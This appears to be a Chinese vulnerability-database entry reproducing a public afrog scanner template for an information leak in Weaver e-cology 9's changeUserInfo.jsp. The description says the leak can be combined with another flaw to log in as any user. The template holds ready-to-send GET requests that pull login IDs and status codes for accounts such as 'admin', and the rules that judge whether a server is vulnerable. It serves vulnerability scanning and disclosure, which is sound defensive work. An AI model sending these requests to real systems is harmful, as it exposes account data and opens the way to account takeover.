ecology-changeuserinfo-info-leak: 泛微 e-cology changeuserinfo 信息泄露

日期: 2025-09-01 | 影响软件: 泛微e-cology | POC: 已公开

漏洞描述

泛微e-cology9中存在信息泄露及任意用户登录漏洞，远程攻击者可利用两个漏洞组合任意登录系统中的用户

PoC代码[已公开]

id: ecology-changeuserinfo-info-leak

info:
  name: 泛微 e-cology changeuserinfo 信息泄露
  author: Chaitin
  severity: high
  verified: true
  description: |
    泛微e-cology9中存在信息泄露及任意用户登录漏洞，远程攻击者可利用两个漏洞组合任意登录系统中的用户
  reference:
    - https://mp.weixin.qq.com/s/Rhk7DaiL_YgqzaRwahDmjw
  solutions: 泛微e-cology9
  tags: ecology
  created: 2023/06/28

rules:
  r0:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=1
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') && 
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r1:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=2
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
  r2:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=3
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
  r3:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=4
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
  r4:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=5
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
  r5:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=status&loginId=admin
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"code":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
  r6:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=status&loginId=test
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"code":') && 
      response.body.bcontains(b'"status":"1"')&&
      !response.body.bcontains(b'"code":"-1"')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/ecology-changeuserinfo-info-leak.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

ecology-ofslogin-aul: 泛微 e-cology 任意用户登录漏洞 POC

泛微e-cology list 前台SQL注入漏洞 无POC

泛微E-Cology登录绕过漏洞 无POC

泛微e-cology 前台SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

泛微e-cology list 前台SQL注入漏洞无POC

泛微E-Cology登录绕过漏洞无POC

泛微e-cology 前台SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC